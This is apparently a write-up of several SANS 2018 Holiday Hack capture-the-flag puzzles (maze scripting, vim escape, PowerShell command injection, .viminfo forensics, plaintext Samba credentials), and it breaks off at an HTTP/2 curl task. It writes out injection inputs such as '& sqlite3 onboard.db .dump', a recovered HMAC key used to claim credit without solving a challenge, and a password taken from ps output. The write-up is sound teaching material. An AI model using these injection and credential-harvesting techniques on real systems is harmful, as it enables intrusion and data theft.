SANS 2018 Holiday Hack Writeup

On the left side of the lobby in Santa's Castle is a large air vent that's large enough to crawl through, upon entering it's soon clear that this is a maze. This can be solved manually by carefully crafting a map during an hour long meeting (not that anyone would do that).

In Objective 4, we manage to recover a map from the GitLab server.

Perhaps the most fun way to solve the maze is programmatically. To move, your browser sends a request like:

https://vents.kringlecastle.com/move?heading=w&mazex=23&mazey=19&mazef=1&playeraction=forward&locationkey=ba49a09644aa8fa7fb0082e935f46521&resourceid=inigomontoya

Breaking that out to be more clear:

It's important to note that every location on the vent map has a unique locationkey. So we can't just sent a request for every possible x,y,f position without traversing the maze and learning the location keys. Assuming you send an action that moves you to a valid location, the server response will include a number of variables outlining your current state:

window.onload = function() {

  document.getElementById("top").style.visibility="hidden";
  document.getElementById("bottom").style.visibility="hidden";
  document.getElementById("arrow-up").style.visibility="hidden";
  document.getElementById("arrow-down").style.visibility="hidden";

  //next section depends on player state
  document.getElementById("mazeform").elements.namedItem("heading").value = "w";
  document.getElementById("mazeform").elements.namedItem("mazex").value = "22";
  document.getElementById("mazeform").elements.namedItem("mazey").value = "19";
  document.getElementById("mazeform").elements.namedItem("mazef").value = "1";
  document.getElementById("mazeform").elements.namedItem("locationkey").value = "07edf09b26a307b9fe4f40bedffe76ed";
  document.getElementById("mazeform").elements.namedItem("resourceid").value = "inigomontoya";
  document.getElementById("wallform").elements.namedItem("northwall").value = "True";
  document.getElementById("wallform").elements.namedItem("southwall").value = "True";
  document.getElementById("wallform").elements.namedItem("eastwall").value = "False";
  document.getElementById("wallform").elements.namedItem("westwall").value = "False";

  wallcheck();  //render correct walls once state is known
};

The important parts here are the True/False value of the four walls, which gives us valid headings, and the locationkey for our new coordinates. The size of the response is generally within a few bytes (3509-3514) which can be used to help find locations that aren't like the others, like the shaft to the second floor and the exit. In these cases the response size changes as well as the arrow-up/arrow-down elements may be visible instead of hidden.

A Python script was written to automatically solve the maze by always going right. It generates a map with the following final output. 'S' is the starting location, 'U' and 'D' represent up and down possibilities, and 'X' marks the current location: the exit.

U.███████.█████.█.█.███    D████████..............
█.█.....█.█...█.█.█...█    ......█.█..............
███.....█████.█████████    █████.█.█..............
............█..........    ....█.█.█..............
............███.███.███    █.█.█.█.█...........███
..............█...█...█    █.█.█...█...........█.█
..............█.█.█.█.█    ███.█.███...........█.X
..............█.█.█.█.█    █.█.█.█.............█..
..............███.█.█.█    █.█.███.......█████████
................█.█.█.█    █.█.█.........█.....█..
................███.███    █.█.█.......███.█.█████
..................█.█..    █...█.......█...█.█...█
............█████████.█    ███████████████.█.███.█
............█.█.█.....█    █.█.......█.█.█.█...█..
............█.█.███████    █.█.███.███.█.█.█████.█
............█.......█..    █.....█.█.......█...█.█
............█████.█████    ███.███████.█████.█.███
................█......    █...█...........█.█.█.█
................██████S    █.███.█████████████.█.█

<html><head>
    <script src="./conduit.js"></script>
    <script>
        __POST_RESULTS__({ hash:"9ab70b3f354515c18885f34e7ac903eedcac2f93d1b28de249e3222ff7f83db9", 
                           resourceId: "inigomontoya"});
     </script>
</head><body><h1><font color="green">Congratulations!</body></html>

Exiting the vent maze you end up in Santa's Secret Room. The other way to get there is through the Scan-o-matic challenge.

When we login, we're presented with the following screen:

I'm in quite a fix, I need a quick escape.
Pepper is quite pleased, while I watch here, agape.
Her editor's confusing, though "best" she says - she yells!
My lesson one and your role is exit back to shellz.

-Bushy Evergreen

Exit vi.

This can be easily solved with the hint from Bushy Evergreen. As the page says, to exit, hit Esc, then type :q!<Enter>. Escape ensures that vi is in command mode, q is the command for quit, and the exclamation point instructs it to not warn us about any unsaved changes.

The Docker terminals drop us into a terminal with our Bash shell running. Normally when Bash is running, it will read some configuration files on startup, including .bashrc in the user's home directory. Inspecting our .bashrc, we see the following two lines at the bottom:

vim .message
/usr/local/bin/successfulescape

When Bash starts, it runs vim, opening the file .message. Whenever vim exits, it runs /usr/local/bin/successfulescape.

Using our technique to reverse engineer binaries, we can recover this script. The main logic of the script is:

if checkvimps() == False:
    hmac256 = calcHmac(key, RESOURCEID)
    printResponse(hmac256, RESOURCEID)
    time.sleep(0.5)
    print('\nYou did it! Congratulations!\n')
else:
    print('Hmm.  I think vim is still running...')

The checkvimps function will actually make sure that no process named vi is running. So, even if you had called successfulescape from within vim, you would not receive credit.

def checkvimps():
    pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
    for pid in pids:
        try:
            if open(os.path.join('/proc', pid, 'comm'), 'rb').read()[0:2] == 'vi':
                return True
        except IOError:
            continue

    return False

The final noteworthy portion of this script is calculating the HMAC which is sent to the game server to receive credit for completion of this challenge. The HMAC algorithm is discussed in detail in Appendix 2 However, the source code does reveal the HMAC key:

key = '2bb6b9c702834095a9c3284e053da124'

We escaped vim by giving the quit command. We then showed how vim was being started upon login, and how we received credit for completing it. We successfully reverse-engineered the successfulescape binary, and recoved the HMAC key, so now we can receive credit without ever solving the challenge at all.

When we launch the Cranberry Pi, we see:

We just hired this new worker,
Californian or New Yorker?
Think he's making some new toy bag...
My job is to make his name tag.

Golly gee, I'm glad that you came,
I recall naught but his last name!
Use our system or your own plan,
Find the first name of our guy "Chan!"

-Bushy Evergreen

To solve this challenge, determine the new worker's first name and submit to runtoanswer.




====================================================================
=                                                                  =
= S A N T A ' S  C A S T L E  E M P L O Y E E  O N B O A R D I N G =
=                                                                  =
====================================================================




 Press  1 to start the onboard process.
 Press  2 to verify the system.
 Press  q to quit.


Please make a selection: 

Given the hints, it sounds like our penultimate step is to dump the data from SQLite, and look for someone named Chan. The Powershell menu presents us with three options:

Press  1 to start the onboard process.
Press  2 to verify the system.
Press  q to quit.

Maybe we're on a quitting streak after the first terminal, but we start by trying to get to a command prompt directly, and hit q to quit. Unfortunately, that hangs the terminal, and we can't type anything else.

Reloading, and trying again, we do the onboard process. Minty mentioned trying to give Powershell tricky characters, like ; and &:

Welcome to Santa's Castle!
At Santa's Castle, our employees are our family. We care for each other,
and support everyone in our common goals.
Your first test at Santa's Castle is to complete the new employee onboarding paperwork.
Don't worry, it's an easy test! Just complete the required onboarding information below.
Enter your first name.
: Minty;
Enter your last name.
: Candy Cane &
Enter your street address (line 1 of 2).
: 221B Baker Street;
Enter your street address (line 2 of 2).
: NW1 6XE;
Enter your city.
: London;
Enter your postal code.
: NW1 6XE;
Enter your phone number.
: 8175309;
Enter your email address.
: minty.candycane@kringlecon.com;
Is this correct?
Minty; Candy Cane &
221B Baker Street;
NW1 6XE;
London;, NW1 6XE;
8175309;
minty.candycane@kringlecon.com;
y/n: y
Save to sqlite DB using command line
Press Enter to continue...: 

No luck. Once we hit enter, we're back in the main menu. We'll move on to the last unexplored option, verifying the system.

Validating data store for employee onboard information.
Enter address of server: 1.1.1.1
connect: Network is unreachable
onboard.db: SQLite 3.x database
Press Enter to continue...: 

# Try again...

Validating data store for employee onboard information.
Enter address of server: 8.8.8.8
connect: Network is unreachable
onboard.db: SQLite 3.x database
Press Enter to continue...: 

# One more attempt:

Validating data store for employee onboard information.
Enter address of server: localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.036 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.060 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.061 ms
--- localhost ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2045ms
rtt min/avg/max/mdev = 0.036/0.052/0.061/0.013 ms
onboard.db: SQLite 3.x database

So, the verification pings the server you give it, and then checks the onboard.db file. Once again, let's try giving it some potentially troublesome characters:

Validating data store for employee onboard information.
Enter address of server: &
Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
	    [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
	    [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
	    [-w deadline] [-W timeout] [hop1 ...] destination
onboard.db: SQLite 3.x database
Press Enter to continue...: 

# Try again...

Validating data store for employee onboard information.
Enter address of server: ;
Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
	    [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
	    [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
	    [-w deadline] [-W timeout] [hop1 ...] destination
onboard.db: SQLite 3.x database
Press Enter to continue...: 

Submitting & and ; behave the same – we see the usage information for ping. It's the same output we would see if we called ping without any arguments. One of the pages that Minty linked us to said that we can use the & operator in Powershell to call other commands. Let's try it:

Validating data store for employee onboard information.
Enter address of server: & ls
Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
	    [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
	    [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
	    [-w deadline] [-W timeout] [hop1 ...] destination
menu.ps1  onboard.db  runtoanswer
onboard.db: SQLite 3.x database
Press Enter to continue...: 

It's a bit hard to see in the output, but we have a different line from the time before: menu.ps1 onboard.db runtoanswer. This would be the output from our ls command.

At this point, we can exit the Powershell menu and run our own commands. Now we can dump the SQLite database, using the tips in the second link that Minty provided:

Validating data store for employee onboard information.
Enter address of server: & sqlite3 onboard.db .dump
Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
	    [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
	    [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
	    [-w deadline] [-W timeout] [hop1 ...] destination
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE onboard (
    id INTEGER PRIMARY KEY,
    fname TEXT NOT NULL,
    lname TEXT NOT NULL,
    street1 TEXT,
    street2 TEXT,
    city TEXT,
    postalcode TEXT,
    phone TEXT,
    email TEXT
);
INSERT INTO "onboard" VALUES(10,'Karen','Duck','52 Annfield Rd',NULL,'BEAL','DN14 7AU','077 8656 6609','karensduck@einrot.com');
INSERT INTO "onboard" VALUES(11,'Josephine','Harrell','3 Victoria Road',NULL,'LITTLE ASTON','B74 8XD','079 5532 7917','josephinedharrell@einrot.com');
INSERT INTO "onboard" VALUES(12,'Jason','Madsen','4931 Cliffside Drive',NULL,'Worcester','12197','607-397-0037','jasonlmadsen@einrot.com');
INSERT INTO "onboard" VALUES(13,'Nichole','Murphy','53 St. John Street',NULL,'Craik','S4P 3Y2','306-734-9091','nicholenmurphy@teleworm.us');
INSERT INTO "onboard" VALUES(14,'Mary','Lyons','569 York Mills Rd',NULL,'Toronto','M3B 1Y2','416-274-6639','maryjlyons@superrito.com');
...

Success! But it's hard to find Chan in all of that. Let's see if we can pass our output to the grep command, returning only lines that contain "Chan."

Validating data store for employee onboard information.
Enter address of server: & sqlite3 onboard.db .dump | grep Chan
Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
	    [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
	    [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
	    [-w deadline] [-W timeout] [hop1 ...] destination
INSERT INTO "onboard" VALUES(84,'Scott','Chan','48 Colorado Way',NULL,'Los Angeles','90067','4017533509','scottmchan90067@gmail.com');
onboard.db: SQLite 3.x database
Press Enter to continue...: 

Great. We now have one final hurdle – we need to call runtoanswer and answer the question. The same technique works there too:

Validating data store for employee onboard information.
Enter address of server: & ./runtoanswer
Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
	    [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
	    [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
	    [-w deadline] [-W timeout] [hop1 ...] destination

Loading, please wait......

Enter Mr. Chan's first name: Scott

    .;looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooool:'    
  'ooooooooooookOOooooxOOdodOOOOOOOdoxOOdoooooOOkoooooooxO000Okdooooooooooooo;  
 'oooooooooooooXMWooooOMMxodMMNKKKKxoOMMxoooooWMXoooookNMWK0KNMWOooooooooooooo; 
 :oooooooooooooXMWooooOMMxodMM0ooooooOMMxoooooWMXooooxMMKoooooKMMkooooooooooooo 
 coooooooooooooXMMMMMMMMMxodMMWWWW0ooOMMxoooooWMXooooOMMkoooookMM0ooooooooooooo 
 coooooooooooooXMWdddd0MMxodMM0ddddooOMMxoooooWMXooooOMMOoooooOMMkooooooooooooo 
 coooooooooooooXMWooooOMMxodMMKxxxxdoOMMOkkkxoWMXkkkkdXMW0xxk0MMKoooooooooooooo 
 cooooooooooooo0NXooookNNdodXNNNNNNkokNNNNNNOoKNNNNNXookKNNWNXKxooooooooooooooo 
 cooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo 
 cooooooooooooooooooooooooooooooooooMYcNAMEcISooooooooooooooooooooooooooooooooo
 cddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddo 
 OMMMMMMMMMMMMMMMNXXWMMMMMMMNXXWMMMMMMWXKXWMMMMWWWWWWWWWMWWWWWWWWWMMMMMMMMMMMMW 
 OMMMMMMMMMMMMW:  .. ;MMMk'     .NMX:.  .  .lWO         d         xMMMMMMMMMMMW 
 OMMMMMMMMMMMMo  OMMWXMMl  lNMMNxWK  ,XMMMO  .MMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW 
 OMMMMMMMMMMMMX.  .cOWMN  'MMMMMMM;  WMMMMMc  KMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW 
 OMMMMMMMMMMMMMMKo,   KN  ,MMMMMMM,  WMMMMMc  KMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW 
 OMMMMMMMMMMMMKNMMMO  oM,  dWMMWOWk  cWMMMO  ,MMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW 
 OMMMMMMMMMMMMc ...  cWMWl.  .. .NMk.  ..  .oMMMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW 
 xXXXXXXXXXXXXXKOxk0XXXXXXX0kkkKXXXXXKOkxkKXXXXXXXKOKXXXXXXXKO0XXXXXXXXXXXXXXXK 
 .oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo, 
  .looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo,  
    .,cllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllc;.    

Congratulations!

onboard.db: SQLite 3.x database
Press Enter to continue...: 

Answer:

This was classic command injection. There were a few other techniques that could've worked here, including using a semicolon instead of the ampersand (e.g. ; ./runtoanswer).

We also discovered that the menu.ps1 script had an unlisted option:

Show-Menu
$input = Read-Host 'Please make a selection'
switch ($input)
{
    '1' {
        cls
        Employee-Onboarding-Form
    } '2' {
        cls
        Write-Host "Validating data store for employee onboard information."
        $server = Read-Host 'Enter address of server'
        /bin/bash -c "/bin/ping -c 3 $server"
        /bin/bash -c "/usr/bin/file onboard.db"
    } '9' {
        /usr/bin/pwsh
        return
    } 'q' {
        return
    } default {
        Write-Host "Invalid entry."
    }
}
pause

Hitting option 9 drops us into a Powershell shell:

Please make a selection: 9
PowerShell v6.0.3
Copyright (c) Microsoft Corporation. All rights reserved.
https://aka.ms/pscore6-docs
Type 'help' to get help.
PS /home/elf> ./runtoanswer                                                                                                                                                                                                       

Loading, please wait......

The onboarding Powershell script was vulnerable to command injection. By running a command to dump the database, we found our guy, and were able to successfully call runtoanswer. Furthermore, by inspecting the Powershell source code, we discovered a hidden backdoor in the menu.

When we open the terminal, we see:

Christmas is coming, and so it would seem,
ER (Elf Resources) crushes elves' dreams.
One tells me she was disturbed by a bloke.
He tells me this must be some kind of joke.

Please do your best to determine what's real.
Has this jamoke, for this elf, got some feels?
Lethal forensics ain't my cup of tea;
If YOU can fake it, my hero you'll be.

One more quick note that might help you complete,
Clearing this mess up that's now at your feet.
Certain text editors can leave some clue.
Did our young Romeo leave one for you?

- Tangle Coalbox, ER Investigator

  Find the first name of the elf of whom a love poem 
  was written.  Complete this challenge by submitting 
  that name to runtoanswer.

This one seems pretty straightforward. We have a single hint, and the hint only discusses the importance of the .viminfo file. Let's take a look at that, but before we do anything, we want to do two things: Look at the metadata, and copy the file so that we don't accidentally modify it (by opening vim, say):

elf@viminfo:~$ stat .viminfo > .viminfo_metadata
elf@viminfo:~$ cp .viminfo .viminfo.original
elf@viminfo:~$ cat .viminfo_metadata 
  File: .viminfo
  Size: 5063            Blocks: 16         IO Block: 4096   regular file
Device: 801h/2049d      Inode: 424344      Links: 1
Access: (0644/-rw-r--r--)  Uid: ( 1000/     elf)   Gid: ( 1000/     elf)
Access: 2018-12-14 16:13:20.000000000 +0000
Modify: 2018-12-14 16:13:20.000000000 +0000
Change: 2018-12-16 00:28:58.687164035 +0000
Birth: -    

To start, we need to figure out what love poem was written. The "Forensic Relevance of Vim Artifacts" web page has this to say:

File marks are among the last items in most .viminfo files and essentially consist of a list of files that have been opened with Vim. A ‘mark’ allows a user to record their location in a file they were editing, like a bookmark of sorts, which they can jump back to. On Linux systems, the “History of marks within files” section of .viminfo records the last 20 files that were opened using the Vim editor, along with their file path (relative to the user) and epoch timestamp.

As we view the .viminfo.original file, it's fairly obvious that only one file was recently opened:

# History of marks within files (newest to oldest):
> ~/.secrets/her/poem.txt
	*       1536607217      0
	"       34      2
	^       24      57
	.       20      0
    ...

Opening up ~./secrets/her/poem.txt:

Once upon a sleigh so weary, Morcel scrubbed the grime so dreary,
Shining many a beautiful sleighbell bearing cheer and sound so pure–
  There he cleaned them, nearly napping, suddenly there came a tapping,
As of someone gently rapping, rapping at the sleigh house door.
"'Tis some caroler," he muttered, "tapping at my sleigh house door–
  Only this and nothing more."

Then, continued with more vigor, came the sound he didn't figure,
Could belong to one so lovely, walking 'bout the North Pole grounds.
  But the truth is, she WAS knocking, 'cause with him she would be talking,
Off with fingers interlocking, strolling out with love newfound?
Gazing into eyes so deeply, caring not who sees their rounds.
  Oh, 'twould make his heart resound!

Hurried, he, to greet the maiden, dropping rag and brush - unlaiden.
Floating over, more than walking, moving toward the sound still knocking,
  Pausing at the elf-length mirror, checked himself to study clearer,
Fixing hair and looking nearer, what a hunky elf - not shocking!
Peering through the peephole smiling, reaching forward and unlocking:
  NEVERMORE in tinsel stocking!

Greeting her with smile dashing, pearly-white incisors flashing,
Telling jokes to keep her laughing, soaring high upon the tidings,
  Of good fortune fates had borne him. Offered her his dexter forelimb,
Never was his future less dim! Should he now consider gliding–
No - they shouldn't but consider taking flight in sleigh and riding
  Up above the Pole abiding?

Smile, she did, when he suggested that their future surely rested,
Up in flight above their cohort flying high like ne'er before!
  So he harnessed two young reindeer, bold and fresh and bearing no fear.
In they jumped and seated so near, off they flew - broke through the door!
Up and up climbed team and humor, Morcel being so adored,
  By his lovely NEVERMORE!

-Morcel Nougat

NEVERMORE seems like an odd name for an elf, and submitting this to runtoanswer yields:

Who was the poem written about? NEVERMORE
Sorry, I don't think that's what the forensic data shows.

Returning to our .viminfo file, we see:

# Last Substitute Search Pattern:
~MSle0~&Elinore

# Last Substitute String:
$NEVERMORE

# Command Line History (newest to oldest):
:wq
|2,0,1536607231,,"wq"
:%s/Elinore/NEVERMORE/g
|2,0,1536607217,,"%s/Elinore/NEVERMORE/g"

It seems like our elf did a find-and-replace on "Elinore," replacing all instances with "NEVERMORE."

elf@viminfo:~$ ./runtoanswer

Loading, please wait......

Who was the poem written about? Elinore

WWNXXK00OOkkxddoolllcc::;;;,,,'''.............                                 
WWNXXK00OOkkxddoolllcc::;;;,,,'''.............                                 
WWNXXK00OOkkxddoolllcc::;;;,,,'''.............                                 
WWNXXKK00OOOxddddollcccll:;,;:;,'...,,.....'',,''.    .......    .''''''       
WWNXXXKK0OOkxdxxxollcccoo:;,ccc:;...:;...,:;'...,:;.  ,,....,,.  ::'....       
WWNXXXKK0OOkxdxxxollcccoo:;,cc;::;..:;..,::...   ;:,  ,,.  .,,.  ::'...        
WWNXXXKK0OOkxdxxxollcccoo:;,cc,';:;':;..,::...   ,:;  ,,,',,'    ::,'''.       
WWNXXXK0OOkkxdxxxollcccoo:;,cc,'';:;:;..'::'..  .;:.  ,,.  ','   ::.           
WWNXXXKK00OOkdxxxddooccoo:;,cc,''.,::;....;:;,,;:,.   ,,.   ','  ::;;;;;       
WWNXXKK0OOkkxdddoollcc:::;;,,,'''...............                               
WWNXXK00OOkkxddoolllcc::;;;,,,'''.............                                 
WWNXXK00OOkkxddoolllcc::;;;,,,'''.............                                 

Thank you for solving this mystery, Slick.
Reading the .viminfo sure did the trick.
Leave it to me; I will handle the rest.
Thank you for giving this challenge your best.

-Tangle Coalbox
-ER Investigator

Congratulations!

Answer:

We actually see a bit more history in the .viminfo file:

elf@viminfo:~$ grep '/g' .viminfo.original 
:%s/Elinore/NEVERMORE/g
|2,0,1536607217,,"%s/Elinore/NEVERMORE/g"
:s/God/fates/gc
|2,0,1536606833,,"s/God/fates/gc"
:%s/studied/looking/g
|2,0,1536602549,,"%s/studied/looking/g"
:%s/sound/tenor/g
|2,0,1536600579,,"%s/sound/tenor/g"

We can use sed to reverse some of these changes. Though, if we replace "tenor" with "sound," to undo the earliest change, we have no way of knowing which instances of "tenor" were there originally:

sed -e 's/tenor/sound/g' -e 's/looking/studied/g' -e 's/fates/God/gi' -e 's/NEVERMORE/Elinore/g' .secrets/her/poem.txt

And we recover the following poem:

Once upon a sleigh so weary, Morcel scrubbed the grime so dreary,
Shining many a beautiful sleighbell bearing cheer and sound so pure–
  There he cleaned them, nearly napping, suddenly there came a tapping,
As of someone gently rapping, rapping at the sleigh house door.
"'Tis some caroler," he muttered, "tapping at my sleigh house door–
  Only this and nothing more."

Then, continued with more vigor, came the sound he didn't figure,
Could belong to one so lovely, walking 'bout the North Pole grounds.
  But the truth is, she WAS knocking, 'cause with him she would be talking,
Off with fingers interlocking, strolling out with love newfound?
Gazing into eyes so deeply, caring not who sees their rounds.
  Oh, 'twould make his heart resound!

Hurried, he, to greet the maiden, dropping rag and brush - unlaiden.
Floating over, more than walking, moving toward the sound still knocking,
  Pausing at the elf-length mirror, checked himself to study clearer,
Fixing hair and studied nearer, what a hunky elf - not shocking!
Peering through the peephole smiling, reaching forward and unlocking:
  Elinore in tinsel stocking!

Greeting her with smile dashing, pearly-white incisors flashing,
Telling jokes to keep her laughing, soaring high upon the tidings,
  Of good fortune God had borne him. Offered her his dexter forelimb,
Never was his future less dim! Should he now consider gliding–
No - they shouldn't but consider taking flight in sleigh and riding
  Up above the Pole abiding?

Smile, she did, when he suggested that their future surely rested,
Up in flight above their cohort flying high like ne'er before!
  So he harnessed two young reindeer, bold and fresh and bearing no fear.
In they jumped and seated so near, off they flew - broke through the door!
Up and up climbed team and humor, Morcel being so adored,
  By his lovely Elinore!

-Morcel Nougat

For this terminal, the hint was a big help. By looking at the .viminfo file, we could reconstruct the changes made to the file, and learned that someone had replaced Elinore's name with NEVERMORE.

Opening the terminal, we're greeted with:

Thank you Madam or Sir for the help that you bring!
I was wondering how I might rescue my day.
Finished mucking out stalls of those pulling the sleigh,
My report is now due or my KRINGLE's in a sling!

There's a samba share here on this terminal screen.
What I normally do is to upload the file,
With our network credentials (we've shared for a while).
When I try to remember, my memory's clean!

Be it last night's nog bender or just lack of rest,
For the life of me I can't send in my report.
Could there be buried hints or some way to contort,
Gaining access - oh please now do give it your best!

-Wunorse Openslae


Complete this challenge by uploading the elf's report.txt
file to the samba share at //localhost/report-upload/

The hint links us to a page that discusses risks when passwords are passed on the command line, such as being able to view it with the process status command ps. Let's try it:

elf@plaintext-creds:~$ ps
PID TTY          TIME CMD
19 pts/0    00:00:00 bash
73 pts/0    00:00:00 ps

Not a whole lot of information. By default, ps only shows us a couple of fields, and only for processes we own (and our associated with our current terminal). We can read ps's manual page with man ps, which has the following snippet:

SIMPLE PROCESS SELECTION
   a      Lift the BSD-style "only yourself" restriction...

Let's try it:

elf@plaintext-creds:~$ ps a
  PID TTY      STAT   TIME COMMAND
    1 pts/0    Ss     0:00 /bin/bash /sbin/init
   10 pts/0    S      0:00 sudo -u manager /home/manager/samba-wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not-run-as-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special -
   11 pts/0    S      0:00 sudo -E -u manager /usr/bin/python /home/manager/report-check.py
   15 pts/0    S      0:00 /usr/bin/python /home/manager/report-check.py
   16 pts/0    S      0:00 /bin/bash /home/manager/samba-wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not-run-as-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special --suppr
   18 pts/0    S      0:00 sudo -u elf /bin/bash
   19 pts/0    S      0:00 /bin/bash
  117 pts/0    S      0:00 sleep 60
  135 pts/0    R+     0:00 ps a

That looks better. We can see there's a samba-wrapper.sh process, and a report-check.py process. The samba-wrapper process is particularly interesting, as it seems to have a bunch of command-line arguments. However, by default, ps truncates them to the width of our terminal. Simple solution: zoom out our browser window.

elf@plaintext-creds:~$ ps a
  PID TTY      STAT   TIME COMMAND
    1 pts/0    Ss     0:00 /bin/bash /sbin/init
   10 pts/0    S      0:00 sudo -u manager /home/manager/samba-wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not-run-as-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special --suppress --suppress //localhost/report-upload/ directreindeerflatterystable -U report-upload
   11 pts/0    S      0:00 sudo -E -u manager /usr/bin/python /home/manager/report-check.py
   15 pts/0    S      0:00 /usr/bin/python /home/manager/report-check.py
   16 pts/0    S      0:00 /bin/bash /home/manager/samba-wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not-run-as-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special --suppress --suppress //localhost/report-upload/ directreindeerflatterystable -U report-upload
   18 pts/0    S      0:00 sudo -u elf /bin/bash
   19 pts/0    S      0:00 /bin/bash
  137 pts/0    S      0:00 sleep 60
  140 pts/0    R+     0:00 ps a

The end of the command is //localhost/report-upload/ directreindeerflatterystable -U report-upload. A less hacky solution is to use more ps arguments to see the entire command:

OUTPUT MODIFIERS … –cols n Set screen width.

elf@plaintext-creds:~$ ps a --columns 500  
  PID TTY      STAT   TIME COMMAND
    1 pts/0    Ss     0:00 /bin/bash /sbin/init
   10 pts/0    S      0:00 sudo -u manager /home/manager/samba-wrapper.sh --verbosity=none --no-check-certificate --extraneous-command-argument --do-not-run-as-tyler --accept-sage-advice -a 42 -d~ --ignore-sw-holiday-special --suppress --suppr
ess //localhost/report-upload/ directreindeerflatterystable -U report-upload
...

At this point, we suspect that "directreindeerflatterystable" is our password. Now we need to figure out how to copy it to the //localhost/report-upload/ SMB share. Some Googling points us to the smbclient command:

elf@plaintext-creds:~$ smbclient -h
Usage: smbclient ... [-U|--user=USERNAME] ... service <password>

smbclient has a lot of options, but as we parse the usage information, it seems like the snippet recoverd from the end of samba-wrapper.sh should just work:

elf@plaintext-creds:~$ smbclient //localhost/report-upload/ directreindeerflatterystable -U report-upload
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.12-Debian]
smb: \> pwd
Current directory is \\localhost\report-upload\

Uploading the report is as simple as:

smb: \> put report.txt
putting file report.txt as \report.txt (250.5 kb/s) (average 250.5 kb/s)

Once we do so, the following happens:

smb: \> Terminated
elf@plaintext-creds:~$ 

			       .;;;;;;;;;;;;;;;'                               
			     ,NWOkkkkkkkkkkkkkkNN;                             
			   ..KM; Stall Mucking ,MN..                           
			 OMNXNMd.             .oMWXXM0.                        
			;MO   l0NNNNNNNNNNNNNNN0o   xMc                        
			:MO                         xMl             '.         
			:MO   dOOOOOOOOOOOOOOOOOd.  xMl             :l:.       
 .cc::::::::;;;;;;;;;;;,oMO  .0NNNNNNNNNNNNNNNNN0.  xMd,,,,,,,,,,,,,clll:.     
 'kkkkxxxxxddddddoooooooxMO   ..'''''''''''.        xMkcccccccllllllllllooc.   
 'kkkkxxxxxddddddoooooooxMO  .MMMMMMMMMMMMMM,       xMkcccccccllllllllllooool  
 'kkkkxxxxxddddddoooooooxMO   '::::::::::::,        xMkcccccccllllllllllool,   
 .ooooollllllccccccccc::dMO                         xMx;;;;;::::::::lllll'     
			:MO  .ONNNNNNNNXk           xMl             :lc'       
			:MO   dOOOOOOOOOo           xMl             ;.         
			:MO   'cccccccccccccc:'     xMl                        
			:MO  .WMMMMMMMMMMMMMMMW.    xMl                        
			:MO    ...............      xMl                        
			.NWxddddddddddddddddddddddddNW'                        
			  ;ccccccccccccccccccccccccc;                          

You have found the credentials I just had forgot,
And in doing so you've saved me trouble untold.
Going forward we'll leave behind policies old,
Building separate accounts for each elf in the lot.

-Wunorse Openslae    

We ran ps, with some extra arguments to see all of the command-line arguments, and recovered the username and password for the SMB share. We then copied the report to the share with smbclient.

Once we open the terminal, we see a curling stone and the following message:

I am Holly Evergreen, and now you won't believe:
Once again the striper stopped; I think I might just leave!
Bushy set it up to start upon a website call.
Darned if I can CURL it on - my Linux skills apall.

Could you be our CURLing master - fixing up this mess?
If you are, there's one concern you surely must address.
Something's off about the conf that Bushy put in place.
Can you overcome this snag and save us all some face?

  Complete this challenge by submitting the right HTTP 
  request to the server at http://localhost:8080/ to 
  get the candy striper started again. You may view 
  the contents of the nginx.conf file in 
  /etc/nginx/, if helpful.    

The terminal tells us to check out /etc/nginx/nginx.conf, so we do that. The following comment catches our attention:

server {
# love using the new stuff! -Bushy
    listen                  8080 http2;
    # server_name           localhost 127.0.0.1;
    root /var/www/html;

The web server has HTTP2 enabled. We read the page that Holly linked us to, but what we're really looking for is how to use the curl command with HTTP2. Chris Elgee's video gives us the following command, which we've adapted for our server running on localhost, port 8080:

